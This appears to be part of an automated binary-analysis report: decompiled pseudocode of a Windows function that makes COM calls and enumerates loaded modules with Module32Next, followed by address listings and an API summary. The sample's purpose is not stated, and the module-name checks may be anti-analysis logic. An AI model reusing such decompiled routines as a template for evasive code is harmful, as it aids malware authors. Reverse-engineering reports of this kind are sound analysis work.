                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)( *_t455 + 0xb4))))(_t455, _t548,  &_v1180); // executed
                                                                                                              							__eflags = _t548 - _t542;
                                                                                                              							if(_t548 != _t542) {
                                                                                                              								__imp__#16(_t548);
                                                                                                              							}
                                                                                                              							_t549 = _v1192;
                                                                                                              							__eflags = _t549 - _t542;
                                                                                                              							if(_t549 == _t542) {
                                                                                                              								E0040AD50(0x80004003);
                                                                                                              							}
                                                                                                              							_t387 = _v1188;
                                                                                                              							__eflags = _t387 - _t542;
                                                                                                              							if(_t387 != _t542) {
                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_t387 + 8))))(_t387);
                                                                                                              							}
                                                                                                              							_t388 = _v1176;
                                                                                                              							_v1188 = _t542;
                                                                                                              							__eflags = _t388 - _t542;
                                                                                                              							if(_t388 == _t542) {
                                                                                                              								_t389 = 0;
                                                                                                              								__eflags = 0;
                                                                                                              							} else {
                                                                                                              								_t389 =  *_t388;
                                                                                                              							}
                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)( *_t549 + 0x44))))(_t549, _t389,  &_v1188); // executed
                                                                                                              							__imp__#411(0xc, _t542, _t542);
                                                                                                              							_t476 = _v1212;
                                                                                                              							__eflags = _t476 - _t542;
                                                                                                              							if(_t476 == _t542) {
                                                                                                              								E0040AD50(0x80004003);
                                                                                                              							}
                                                                                                              							_t550 = _v1144;
                                                                                                              							__eflags = _t550 - _t542;
                                                                                                              							if(_t550 == _t542) {
                                                                                                              								_t517 = 0;
                                                                                                              								__eflags = 0;
                                                                                                              							} else {
                                                                                                              								_t517 =  *_t550;
                                                                                                              							}
                                                                                                              							_t568 = _t567 - 0x10;
                                                                                                              							_t393 = _t568;
                                                                                                              							 *_t393 = _v1136;
                                                                                                              							 *((intOrPtr*)(_t393 + 4)) = _v1132;
                                                                                                              							 *((intOrPtr*)(_t393 + 8)) = _v1128;
                                                                                                              							 *(_t393 + 0xc) = _v1124;
                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)( *_t476 + 0xe4))))(_t476, _t517, 0x118, _t542, _t542,  &_v1120);
                                                                                                              							_t457 = __imp__#9; // 0x76e3cf00
                                                                                                              							 *_t457( &_v1160);
                                                                                                              							__eflags = _t550 - _t542;
                                                                                                              							if(_t550 != _t542) {
                                                                                                              								_t409 = InterlockedDecrement(_t550 + 8);
                                                                                                              								__eflags = _t409;
                                                                                                              								if(_t409 == 0) {
                                                                                                              									_t410 =  *_t550;
                                                                                                              									__eflags = _t410 - _t542;
                                                                                                              									if(_t410 != _t542) {
                                                                                                              										__imp__#6(_t410);
                                                                                                              									}
                                                                                                              									_t411 =  *((intOrPtr*)(_t550 + 4));
                                                                                                              									__eflags = _t411 - _t542;
                                                                                                              									if(__eflags != 0) {
                                                                                                              										_push(_t411);
                                                                                                              										E0040AF8B(_t457, _t542, _t550, __eflags);
                                                                                                              										_t568 = _t568 + 4;
                                                                                                              									}
                                                                                                              									E0040AE80(_t457, _t542, _t550, __eflags, _t550);
                                                                                                              									_t568 = _t568 + 4;
                                                                                                              								}
                                                                                                              							}
                                                                                                              							 *_t457( &_v1180);
                                                                                                              							_t397 = _v1260;
                                                                                                              							__eflags = _t397 - _t542;
                                                                                                              							if(_t397 != _t542) {
                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_t397 + 8))))(_t397);
                                                                                                              							}
                                                                                                              							_t551 = _v1248;
                                                                                                              							__eflags = _t551 - _t542;
                                                                                                              							if(_t551 != _t542) {
                                                                                                              								_t401 = InterlockedDecrement(_t551 + 8);
                                                                                                              								__eflags = _t401;
                                                                                                              								if(_t401 == 0) {
                                                                                                              									_t402 =  *_t551;
                                                                                                              									__eflags = _t402 - _t542;
                                                                                                              									if(_t402 != _t542) {
                                                                                                              										__imp__#6(_t402);
                                                                                                              									}
                                                                                                              									_t403 =  *((intOrPtr*)(_t551 + 4));
                                                                                                              									__eflags = _t403 - _t542;
                                                                                                              									if(__eflags != 0) {
                                                                                                              										_push(_t403);
                                                                                                              										E0040AF8B(_t457, _t542, _t551, __eflags);
                                                                                                              										_t568 = _t568 + 4;
                                                                                                              									}
                                                                                                              									E0040AE80(_t457, _t542, _t551, __eflags, _t551);
                                                                                                              								}
                                                                                                              							}
                                                                                                              							_t398 = _v1264;
                                                                                                              							__eflags = _t398 - _t542;
                                                                                                              							if(_t398 != _t542) {
                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_t398 + 8))))(_t398);
                                                                                                              							}
                                                                                                              						}
                                                                                                              						_t372 = _v1140;
                                                                                                              						__eflags = _t372 - _t542;
                                                                                                              						if(_t372 != _t542) {
                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)( *_t372 + 8))))(_t372);
                                                                                                              						}
                                                                                                              						_t373 = _v1136;
                                                                                                              						__eflags = _t373 - _t542;
                                                                                                              						if(_t373 != _t542) {
                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)( *_t373 + 8))))(_t373);
                                                                                                              						}
                                                                                                              						goto L102;
                                                                                                              					} else {
                                                                                                              						_t440 = E00401650( &_v1092,  &_v980);
                                                                                                              						_t570 = _t560 + 8;
                                                                                                              						_t528 =  &_v528;
                                                                                                              						while(1) {
                                                                                                              							_t496 =  *_t528;
                                                                                                              							if(_t496 !=  *_t440) {
                                                                                                              								break;
                                                                                                              							}
                                                                                                              							if(_t496 == 0) {
                                                                                                              								L7:
                                                                                                              								_t440 = 0;
                                                                                                              							} else {
                                                                                                              								_t502 =  *((intOrPtr*)(_t528 + 1));
                                                                                                              								if(_t502 !=  *((intOrPtr*)(_t440 + 1))) {
                                                                                                              									break;
                                                                                                              								} else {
                                                                                                              									_t528 = _t528 + 2;
                                                                                                              									_t440 = _t440 + 2;
                                                                                                              									if(_t502 != 0) {
                                                                                                              										continue;
                                                                                                              									} else {
                                                                                                              										goto L7;
                                                                                                              									}
                                                                                                              								}
                                                                                                              							}
                                                                                                              							L9:
                                                                                                              							if(_t440 != 0) {
                                                                                                              								_t442 = E00401650( &_v1164,  &_v1012);
                                                                                                              								_t560 = _t570 + 8;
                                                                                                              								_t497 =  &_v528;
                                                                                                              								while(1) {
                                                                                                              									_t530 =  *_t497;
                                                                                                              									__eflags = _t530 -  *_t442;
                                                                                                              									if(_t530 !=  *_t442) {
                                                                                                              										break;
                                                                                                              									}
                                                                                                              									__eflags = _t530;
                                                                                                              									if(_t530 == 0) {
                                                                                                              										L16:
                                                                                                              										_t442 = 0;
                                                                                                              									} else {
                                                                                                              										_t537 =  *((intOrPtr*)(_t497 + 1));
                                                                                                              										__eflags = _t537 -  *((intOrPtr*)(_t442 + 1));
                                                                                                              										if(_t537 !=  *((intOrPtr*)(_t442 + 1))) {
                                                                                                              											break;
                                                                                                              										} else {
                                                                                                              											_t497 = _t497 + 2;
                                                                                                              											_t442 = _t442 + 2;
                                                                                                              											__eflags = _t537;
                                                                                                              											if(_t537 != 0) {
                                                                                                              												continue;
                                                                                                              											} else {
                                                                                                              												goto L16;
                                                                                                              											}
                                                                                                              										}
                                                                                                              									}
                                                                                                              									L18:
                                                                                                              									__eflags = _t442;
                                                                                                              									if(_t442 == 0) {
                                                                                                              										goto L10;
                                                                                                              									} else {
                                                                                                              										_t445 = Module32Next(_t544,  &_v560);
                                                                                                              										__eflags = _t445;
                                                                                                              										if(_t445 != 0) {
                                                                                                              											do {
                                                                                                              												_t447 = E00401650( &_v1096,  &_v984);
                                                                                                              												_t571 = _t560 + 8;
                                                                                                              												_t499 =  &_v532;
                                                                                                              												while(1) {
                                                                                                              													_t532 =  *_t499;
                                                                                                              													__eflags = _t532 -  *_t447;
                                                                                                              													if(_t532 !=  *_t447) {
                                                                                                              														break;
                                                                                                              													}
                                                                                                              													__eflags = _t532;
                                                                                                              													if(_t532 == 0) {
                                                                                                              														L26:
                                                                                                              														_t447 = 0;
                                                                                                              													} else {
                                                                                                              														_t536 =  *((intOrPtr*)(_t499 + 1));
                                                                                                              														__eflags = _t536 -  *((intOrPtr*)(_t447 + 1));
                                                                                                              														if(_t536 !=  *((intOrPtr*)(_t447 + 1))) {
                                                                                                              															break;
                                                                                                              														} else {
                                                                                                              															_t499 = _t499 + 2;
                                                                                                              															_t447 = _t447 + 2;
                                                                                                              															__eflags = _t536;
                                                                                                              															if(_t536 != 0) {
                                                                                                              																continue;
                                                                                                              															} else {
                                                                                                              																goto L26;
                                                                                                              															}
                                                                                                              														}
                                                                                                              													}
                                                                                                              													L28:
                                                                                                              													__eflags = _t447;
                                                                                                              													if(_t447 == 0) {
                                                                                                              														goto L10;
                                                                                                              													} else {
                                                                                                              														_t448 = E00401650( &_v1168,  &_v1016);
                                                                                                              														_t560 = _t571 + 8;
                                                                                                              														_t501 =  &_v532;
                                                                                                              														while(1) {
                                                                                                              															_t534 =  *_t501;
                                                                                                              															__eflags = _t534 -  *_t448;
                                                                                                              															if(_t534 !=  *_t448) {
                                                                                                              																break;
                                                                                                              															}
                                                                                                              															__eflags = _t534;
                                                                                                              															if(_t534 == 0) {
                                                                                                              																L34:
                                                                                                              																_t448 = 0;
                                                                                                              															} else {
                                                                                                              																_t535 =  *((intOrPtr*)(_t501 + 1));
                                                                                                              																__eflags = _t535 -  *((intOrPtr*)(_t448 + 1));
                                                                                                              																if(_t535 !=  *((intOrPtr*)(_t448 + 1))) {
                                                                                                              																	break;
                                                                                                              																} else {
                                                                                                              																	_t501 = _t501 + 2;
                                                                                                              																	_t448 = _t448 + 2;
                                                                                                              																	__eflags = _t535;
                                                                                                              																	if(_t535 != 0) {
                                                                                                              																		continue;
                                                                                                              																	} else {
                                                                                                              																		goto L34;
                                                                                                              																	}
                                                                                                              																}
                                                                                                              															}
                                                                                                              															L36:
                                                                                                              															__eflags = _t448;
                                                                                                              															if(_t448 == 0) {
                                                                                                              																goto L10;
                                                                                                              															} else {
                                                                                                              																goto L37;
                                                                                                              															}
                                                                                                              															goto L103;
                                                                                                              														}
                                                                                                              														asm("sbb eax, eax");
                                                                                                              														asm("sbb eax, 0xffffffff");
                                                                                                              														goto L36;
                                                                                                              													}
                                                                                                              													goto L103;
                                                                                                              												}
                                                                                                              												asm("sbb eax, eax");
                                                                                                              												asm("sbb eax, 0xffffffff");
                                                                                                              												goto L28;
                                                                                                              												L37:
                                                                                                              												_t450 = Module32Next(_t544,  &_v564);
                                                                                                              												__eflags = _t450;
                                                                                                              											} while (_t450 != 0);
                                                                                                              										}
                                                                                                              										goto L38;
                                                                                                              									}
                                                                                                              									goto L103;
                                                                                                              								}
                                                                                                              								asm("sbb eax, eax");
                                                                                                              								asm("sbb eax, 0xffffffff");
                                                                                                              								goto L18;
                                                                                                              							} else {
                                                                                                              								L10:
                                                                                                              								CloseHandle(_t544);
                                                                                                              								return 0;
                                                                                                              							}
                                                                                                              							goto L103;
                                                                                                              						}
                                                                                                              						asm("sbb eax, eax");
                                                                                                              						asm("sbb eax, 0xffffffff");
                                                                                                              						goto L9;
                                                                                                              					}
                                                                                                              				}
                                                                                                              				L103:
                                                                                                              			}













































































































































































































                                                                                                              0x00401980
                                                                                                              0x00401980
                                                                                                              0x0040198c
                                                                                                              0x004019a1
                                                                                                              0x004019a6
                                                                                                              0x004019ab
                                                                                                              0x004019b0
                                                                                                              0x004019b5
                                                                                                              0x004019ba
                                                                                                              0x004019bf
                                                                                                              0x004019c4
                                                                                                              0x004019c9
                                                                                                              0x004019cd
                                                                                                              0x004019d2
                                                                                                              0x004019d7
                                                                                                              0x004019dc
                                                                                                              0x004019e1
                                                                                                              0x004019e6
                                                                                                              0x004019eb
                                                                                                              0x004019f0
                                                                                                              0x004019f5
                                                                                                              0x004019fa
                                                                                                              0x004019ff
                                                                                                              0x00401a04
                                                                                                              0x00401a09
                                                                                                              0x00401a0e
                                                                                                              0x00401a13
                                                                                                              0x00401a18
                                                                                                              0x00401a1d
                                                                                                              0x00401a22
                                                                                                              0x00401a27
                                                                                                              0x00401a2c
                                                                                                              0x00401a31
                                                                                                              0x00401a36
                                                                                                              0x00401a3b
                                                                                                              0x00401a40
                                                                                                              0x00401a4a
                                                                                                              0x00401a4b
                                                                                                              0x00401a50
                                                                                                              0x00401a58
                                                                                                              0x0040243c
                                                                                                              0x0040243c
                                                                                                              0x00402445
                                                                                                              0x00401a5e
                                                                                                              0x00401a67
                                                                                                              0x00401a73
                                                                                                              0x00401a77
                                                                                                              0x00401a82
                                                                                                              0x00401a87
                                                                                                              0x00401a8c
                                                                                                              0x00401a91
                                                                                                              0x00401a96
                                                                                                              0x00401a9b
                                                                                                              0x00401aa0
                                                                                                              0x00401aa5
                                                                                                              0x00401aaa
                                                                                                              0x00401aaf
                                                                                                              0x00401ab4
                                                                                                              0x00401ab9
                                                                                                              0x00401abe
                                                                                                              0x00401ac3
                                                                                                              0x00401ac8
                                                                                                              0x00401acd
                                                                                                              0x00401ad2
                                                                                                              0x00401ad7
                                                                                                              0x00401adc
                                                                                                              0x00401ae1
                                                                                                              0x00401ae6
                                                                                                              0x00401aeb
                                                                                                              0x00401af0
                                                                                                              0x00401af5
                                                                                                              0x00401afa
                                                                                                              0x00401aff
                                                                                                              0x00401b04
                                                                                                              0x00401b09
                                                                                                              0x00401b0e
                                                                                                              0x00401b13
                                                                                                              0x00401b18
                                                                                                              0x00401b1d
                                                                                                              0x00401b22
                                                                                                              0x00401b2a
                                                                                                              0x00401b2f
                                                                                                              0x00401b34
                                                                                                              0x00401b39
                                                                                                              0x00401b3e
                                                                                                              0x00401b43
                                                                                                              0x00401b48
                                                                                                              0x00401b4d
                                                                                                              0x00401b52
                                                                                                              0x00401b56
                                                                                                              0x00401b5b
                                                                                                              0x00401b60
                                                                                                              0x00401b65
                                                                                                              0x00401b6a
                                                                                                              0x00401b6f
                                                                                                              0x00401b74
                                                                                                              0x00401b79
                                                                                                              0x00401b7e
                                                                                                              0x00401b83
                                                                                                              0x00401b88
                                                                                                              0x00401b8d
                                                                                                              0x00401b92
                                                                                                              0x00401b97
                                                                                                              0x00401b9c
                                                                                                              0x00401ba1
                                                                                                              0x00401ba6
                                                                                                              0x00401bab
                                                                                                              0x00401bb0
                                                                                                              0x00401bb5
                                                                                                              0x00401bba
                                                                                                              0x00401bbf
                                                                                                              0x00401bc4
                                                                                                              0x00401bc9
                                                                                                              0x00401bce
                                                                                                              0x00401bd5
                                                                                                              0x00401d43
                                                                                                              0x00401d44
                                                                                                              0x00401d61
                                                                                                              0x00401d63
                                                                                                              0x00401d68
                                                                                                              0x00401d6d
                                                                                                              0x00401d72
                                                                                                              0x00401d77
                                                                                                              0x00401d7c
                                                                                                              0x00401d81
                                                                                                              0x00401d86
                                                                                                              0x00401d8b
                                                                                                              0x00401d90
                                                                                                              0x00401d95
                                                                                                              0x00401d9a
                                                                                                              0x00401d9f
                                                                                                              0x00401da4
                                                                                                              0x00401da9
                                                                                                              0x00401dae
                                                                                                              0x00401db3
                                                                                                              0x00401db8
                                                                                                              0x00401dbd
                                                                                                              0x00401dc2
                                                                                                              0x00401dc7
                                                                                                              0x00401dcc
                                                                                                              0x00401dd1
                                                                                                              0x00401dd6
                                                                                                              0x00401ddb
                                                                                                              0x00401de0
                                                                                                              0x00401de5
                                                                                                              0x00401dea
                                                                                                              0x00401def
                                                                                                              0x00401df4
                                                                                                              0x00401df9
                                                                                                              0x00401dfe
                                                                                                              0x00401e03
                                                                                                              0x00401e18
                                                                                                              0x00401e1c
                                                                                                              0x00401e26
                                                                                                              0x00401e31
                                                                                                              0x00401e3a
                                                                                                              0x00401e3f
                                                                                                              0x00401e44
                                                                                                              0x00401e46
                                                                                                              0x00401e4b
                                                                                                              0x00401e4e
                                                                                                              0x00401e52
                                                                                                              0x00401e54
                                                                                                              0x00401e70
                                                                                                              0x00401e56
                                                                                                              0x00401e5e
                                                                                                              0x00401e67
                                                                                                              0x00401e6a
                                                                                                              0x00401e6a
                                                                                                              0x00401e7c
                                                                                                              0x00401e81
                                                                                                              0x00401e87
                                                                                                              0x00401e8d
                                                                                                              0x00401e91
                                                                                                              0x00401e92
                                                                                                              0x00401e9a
                                                                                                              0x00401e9d
                                                                                                              0x00401e9f
                                                                                                              0x00401ea5
                                                                                                              0x00401ea9
                                                                                                              0x00401eb0
                                                                                                              0x00401ec0
                                                                                                              0x00401ec0
                                                                                                              0x00401ecd
                                                                                                              0x00401ed2
                                                                                                              0x00401ed7
                                                                                                              0x00401ed8
                                                                                                              0x00401edd
                                                                                                              0x00401ee5
                                                                                                              0x00401ee5
                                                                                                              0x00401ee5
                                                                                                              0x00401ee5
                                                                                                              0x00401ec0
                                                                                                              0x00401ef0
                                                                                                              0x00401ef0
                                                                                                              0x00401ef6
                                                                                                              0x00401eff
                                                                                                              0x00401eff
                                                                                                              0x00401eff
                                                                                                              0x00401f00
                                                                                                              0x00401f02
                                                                                                              0x00401f08
                                                                                                              0x00401f0a
                                                                                                              0x00401f0d
                                                                                                              0x00401f0e
                                                                                                              0x00401f13
                                                                                                              0x00401f13
                                                                                                              0x00401f15
                                                                                                              0x00401f16
                                                                                                              0x00401f16
                                                                                                              0x00401f23
                                                                                                              0x00401f2c
                                                                                                              0x00401f32
                                                                                                              0x00401f35
                                                                                                              0x00401f3c
                                                                                                              0x00401f4a
                                                                                                              0x00401f4c
                                                                                                              0x00401f53
                                                                                                              0x00401f60
                                                                                                              0x00401f6d
                                                                                                              0x00401f7f
                                                                                                              0x00401f7f
                                                                                                              0x00401f82
                                                                                                              0x00401f87
                                                                                                              0x00401f8c
                                                                                                              0x00401f91
                                                                                                              0x00401f96
                                                                                                              0x00401f9b
                                                                                                              0x00401fa0
                                                                                                              0x00401fa5
                                                                                                              0x00401faa
                                                                                                              0x00401faf
                                                                                                              0x00401fb4
                                                                                                              0x00401fb9
                                                                                                              0x00401fbe
                                                                                                              0x00401fc3
                                                                                                              0x00401fc8
                                                                                                              0x00401fcd
                                                                                                              0x00401fd2
                                                                                                              0x00401fd7
                                                                                                              0x00401fdc
                                                                                                              0x00401fe1
                                                                                                              0x00401fe6
                                                                                                              0x00401feb
                                                                                                              0x00401ff0
                                                                                                              0x00401ff5
                                                                                                              0x00401ffa
                                                                                                              0x00401fff
                                                                                                              0x00402004
                                                                                                              0x00402009
                                                                                                              0x0040200e
                                                                                                              0x00402013
                                                                                                              0x00402018
                                                                                                              0x0040201d
                                                                                                              0x00402022
                                                                                                              0x00402030
                                                                                                              0x00402038
                                                                                                              0x0040203d
                                                                                                              0x00402042
                                                                                                              0x00402047
                                                                                                              0x0040204c
                                                                                                              0x00402051
                                                                                                              0x00402056
                                                                                                              0x0040205b
                                                                                                              0x0040206d
                                                                                                              0x00402072
                                                                                                              0x00402077
                                                                                                              0x0040207c
                                                                                                              0x00402081
                                                                                                              0x00402086
                                                                                                              0x0040208b
                                                                                                              0x00402090
                                                                                                              0x00402095
                                                                                                              0x0040209a
                                                                                                              0x0040209f
                                                                                                              0x004020a4
                                                                                                              0x004020a9
                                                                                                              0x004020ae
                                                                                                              0x004020b3
                                                                                                              0x004020b8
                                                                                                              0x004020bd
                                                                                                              0x004020c2
                                                                                                              0x004020c7
                                                                                                              0x004020cc
                                                                                                              0x004020d1
                                                                                                              0x004020d6
                                                                                                              0x004020db
                                                                                                              0x004020e0
                                                                                                              0x004020e5
                                                                                                              0x004020ea
                                                                                                              0x004020ef
                                                                                                              0x004020fa
                                                                                                              0x004020ff
                                                                                                              0x00402112
                                                                                                              0x00402119
                                                                                                              0x0040211d
                                                                                                              0x00402121
                                                                                                              0x00402126
                                                                                                              0x0040212d
                                                                                                              0x00402136
                                                                                                              0x00402137
                                                                                                              0x0040213c
                                                                                                              0x00402141
                                                                                                              0x00402142
                                                                                                              0x00402147
                                                                                                              0x0040214c
                                                                                                              0x00402151
                                                                                                              0x00402153
                                                                                                              0x004021c3
                                                                                                              0x004021c3
                                                                                                              0x00000000
                                                                                                              0x00402155
                                                                                                              0x00402155
                                                                                                              0x0040215f
                                                                                                              0x00402161
                                                                                                              0x00402163
                                                                                                              0x004021c5
                                                                                                              0x004021c5
                                                                                                              0x00402165
                                                                                                              0x00402165
                                                                                                              0x00402169
                                                                                                              0x0040216b
                                                                                                              0x00402173
                                                                                                              0x00402173
                                                                                                              0x00402175
                                                                                                              0x0040217d
                                                                                                              0x00402188
                                                                                                              0x0040218a
                                                                                                              0x0040218e
                                                                                                              0x00402190
                                                                                                              0x00402197
                                                                                                              0x00402197
                                                                                                              0x0040219c
                                                                                                              0x004021a0
                                                                                                              0x004021a2
                                                                                                              0x004021aa
                                                                                                              0x004021aa
                                                                                                              0x004021b1
                                                                                                              0x004021bf
                                                                                                              0x004021bf
                                                                                                              0x00402163
                                                                                                              0x004021ca
                                                                                                              0x004021d8
                                                                                                              0x004021da
                                                                                                              0x004021dc
                                                                                                              0x004021dd
                                                                                                              0x004021e2
                                                                                                              0x004021e2
                                                                                                              0x004021e5
                                                                                                              0x004021ea
                                                                                                              0x004021f9
                                                                                                              0x004021fd
                                                                                                              0x00402202
                                                                                                              0x00402210
                                                                                                              0x00402214
                                                                                                              0x00402222
                                                                                                              0x0040222f
                                                                                                              0x00402238
                                                                                                              0x0040223d
                                                                                                              0x00402241
                                                                                                              0x00402245
                                                                                                              0x0040224f
                                                                                                              0x00402253
                                                                                                              0x00402257
                                                                                                              0x00402264
                                                                                                              0x00402269
                                                                                                              0x0040226d
                                                                                                              0x00402273
                                                                                                              0x00402277
                                                                                                              0x00402279
                                                                                                              0x00402280
                                                                                                              0x00402280
                                                                                                              0x00402285
                                                                                                              0x00402287
                                                                                                              0x0040228b
                                                                                                              0x0040228d
                                                                                                              0x00402295
                                                                                                              0x00402295
                                                                                                              0x0040229c
                                                                                                              0x004022aa
                                                                                                              0x004022ac
                                                                                                              0x004022ae
                                                                                                              0x004022b1
                                                                                                              0x004022b1
                                                                                                              0x004022b7
                                                                                                              0x004022bb
                                                                                                              0x004022bd
                                                                                                              0x004022c4
                                                                                                              0x004022c4
                                                                                                              0x004022c9
                                                                                                              0x004022cd
                                                                                                              0x004022cf
                                                                                                              0x004022d7
                                                                                                              0x004022d7
                                                                                                              0x004022d9
                                                                                                              0x004022dd
                                                                                                              0x004022e1
                                                                                                              0x004022e3
                                                                                                              0x004022e9
                                                                                                              0x004022e9
                                                                                                              0x004022e5
                                                                                                              0x004022e5
                                                                                                              0x004022e5
                                                                                                              0x004022f7
                                                                                                              0x004022fd
                                                                                                              0x00402303
                                                                                                              0x00402307
                                                                                                              0x00402309
                                                                                                              0x00402310
                                                                                                              0x00402310
                                                                                                              0x00402315
                                                                                                              0x0040231c
                                                                                                              0x0040231e
                                                                                                              0x00402324
                                                                                                              0x00402324
                                                                                                              0x00402320
                                                                                                              0x00402320
                                                                                                              0x00402320
                                                                                                              0x00402338
                                                                                                              0x0040233b
                                                                                                              0x0040233d
                                                                                                              0x00402347
                                                                                                              0x00402356
                                                                                                              0x00402368
                                                                                                              0x0040236b
                                                                                                              0x0040236d
                                                                                                              0x0040237b
                                                                                                              0x00402383
                                                                                                              0x00402385
                                                                                                              0x0040238b
                                                                                                              0x0040238d
                                                                                                              0x0040238f
                                                                                                              0x00402391
                                                                                                              0x00402393
                                                                                                              0x00402395
                                                                                                              0x00402398
                                                                                                              0x00402398
                                                                                                              0x0040239e
                                                                                                              0x004023a1
                                                                                                              0x004023a3
                                                                                                              0x004023a5
                                                                                                              0x004023a6
                                                                                                              0x004023ab
                                                                                                              0x004023ab
                                                                                                              0x004023af
                                                                                                              0x004023b4
                                                                                                              0x004023b4
                                                                                                              0x0040238f
                                                                                                              0x004023bf
                                                                                                              0x004023c1
                                                                                                              0x004023c5
                                                                                                              0x004023c7
                                                                                                              0x004023cf
                                                                                                              0x004023cf
                                                                                                              0x004023d1
                                                                                                              0x004023d5
                                                                                                              0x004023d7
                                                                                                              0x004023dd
                                                                                                              0x004023df
                                                                                                              0x004023e1
                                                                                                              0x004023e3
                                                                                                              0x004023e5
                                                                                                              0x004023e7
                                                                                                              0x004023ea
                                                                                                              0x004023ea
                                                                                                              0x004023f0
                                                                                                              0x004023f3
                                                                                                              0x004023f5
                                                                                                              0x004023f7
                                                                                                              0x004023f8
                                                                                                              0x004023fd
                                                                                                              0x004023fd
                                                                                                              0x00402401
                                                                                                              0x00402406
                                                                                                              0x004023e1
                                                                                                              0x00402409
                                                                                                              0x0040240d
                                                                                                              0x0040240f
                                                                                                              0x00402417
                                                                                                              0x00402417
                                                                                                              0x0040240f
                                                                                                              0x00402419
                                                                                                              0x0040241d
                                                                                                              0x0040241f
                                                                                                              0x00402427
                                                                                                              0x00402427
                                                                                                              0x00402429
                                                                                                              0x0040242d
                                                                                                              0x0040242f
                                                                                                              0x00402437
                                                                                                              0x00402437
                                                                                                              0x00000000
                                                                                                              0x00401bdb
                                                                                                              0x00401be8
                                                                                                              0x00401bed
                                                                                                              0x00401bf0
                                                                                                              0x00401bf7
                                                                                                              0x00401bf7
                                                                                                              0x00401bfb
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00401bff
                                                                                                              0x00401c13
                                                                                                              0x00401c13
                                                                                                              0x00401c01
                                                                                                              0x00401c01
                                                                                                              0x00401c07
                                                                                                              0x00000000
                                                                                                              0x00401c09
                                                                                                              0x00401c09
                                                                                                              0x00401c0c
                                                                                                              0x00401c11
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00401c11
                                                                                                              0x00401c07
                                                                                                              0x00401c1c
                                                                                                              0x00401c1e
                                                                                                              0x00401c41
                                                                                                              0x00401c46
                                                                                                              0x00401c49
                                                                                                              0x00401c50
                                                                                                              0x00401c50
                                                                                                              0x00401c52
                                                                                                              0x00401c54
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00401c56
                                                                                                              0x00401c58
                                                                                                              0x00401c6c
                                                                                                              0x00401c6c
                                                                                                              0x00401c5a
                                                                                                              0x00401c5a
                                                                                                              0x00401c5d
                                                                                                              0x00401c60
                                                                                                              0x00000000
                                                                                                              0x00401c62
                                                                                                              0x00401c62
                                                                                                              0x00401c65
                                                                                                              0x00401c68
                                                                                                              0x00401c6a
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00401c6a
                                                                                                              0x00401c60
                                                                                                              0x00401c75
                                                                                                              0x00401c75
                                                                                                              0x00401c77
                                                                                                              0x00000000
                                                                                                              0x00401c79
                                                                                                              0x00401c82
                                                                                                              0x00401c87
                                                                                                              0x00401c89
                                                                                                              0x00401c90
                                                                                                              0x00401c9d
                                                                                                              0x00401ca2
                                                                                                              0x00401ca5
                                                                                                              0x00401cb0
                                                                                                              0x00401cb0
                                                                                                              0x00401cb2
                                                                                                              0x00401cb4
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00401cb6
                                                                                                              0x00401cb8
                                                                                                              0x00401ccc
                                                                                                              0x00401ccc
                                                                                                              0x00401cba
                                                                                                              0x00401cba
                                                                                                              0x00401cbd
                                                                                                              0x00401cc0
                                                                                                              0x00000000
                                                                                                              0x00401cc2
                                                                                                              0x00401cc2
                                                                                                              0x00401cc5
                                                                                                              0x00401cc8
                                                                                                              0x00401cca
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00401cca
                                                                                                              0x00401cc0
                                                                                                              0x00401cd5
                                                                                                              0x00401cd5
                                                                                                              0x00401cd7
                                                                                                              0x00000000
                                                                                                              0x00401cdd
                                                                                                              0x00401cea
                                                                                                              0x00401cef
                                                                                                              0x00401cf2
                                                                                                              0x00401d00
                                                                                                              0x00401d00
                                                                                                              0x00401d02
                                                                                                              0x00401d04
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00401d06
                                                                                                              0x00401d08
                                                                                                              0x00401d1c
                                                                                                              0x00401d1c
                                                                                                              0x00401d0a
                                                                                                              0x00401d0a
                                                                                                              0x00401d0d
                                                                                                              0x00401d10
                                                                                                              0x00000000
                                                                                                              0x00401d12
                                                                                                              0x00401d12
                                                                                                              0x00401d15
                                                                                                              0x00401d18
                                                                                                              0x00401d1a
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00401d1a
                                                                                                              0x00401d10
                                                                                                              0x00401d25
                                                                                                              0x00401d25
                                                                                                              0x00401d27
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00401d27
                                                                                                              0x00401d20
                                                                                                              0x00401d22
                                                                                                              0x00000000
                                                                                                              0x00401d22
                                                                                                              0x00000000
                                                                                                              0x00401cd7
                                                                                                              0x00401cd0
                                                                                                              0x00401cd2
                                                                                                              0x00000000
                                                                                                              0x00401d2d
                                                                                                              0x00401d36
                                                                                                              0x00401d3b
                                                                                                              0x00401d3b
                                                                                                              0x00401c90
                                                                                                              0x00000000
                                                                                                              0x00401c89
                                                                                                              0x00000000
                                                                                                              0x00401c77
                                                                                                              0x00401c70
                                                                                                              0x00401c72
                                                                                                              0x00000000
                                                                                                              0x00401c20
                                                                                                              0x00401c20
                                                                                                              0x00401c21
                                                                                                              0x00401c33
                                                                                                              0x00401c33
                                                                                                              0x00000000
                                                                                                              0x00401c1e
                                                                                                              0x00401c17
                                                                                                              0x00401c19
                                                                                                              0x00000000
                                                                                                              0x00401c19
                                                                                                              0x00401bd5
                                                                                                              0x00000000

                                                                                                              APIs
                                                                                                              • OleInitialize.OLE32(00000000), ref: 0040198C
                                                                                                              • _getenv.LIBCMT ref: 00401A4B
                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00401A5E
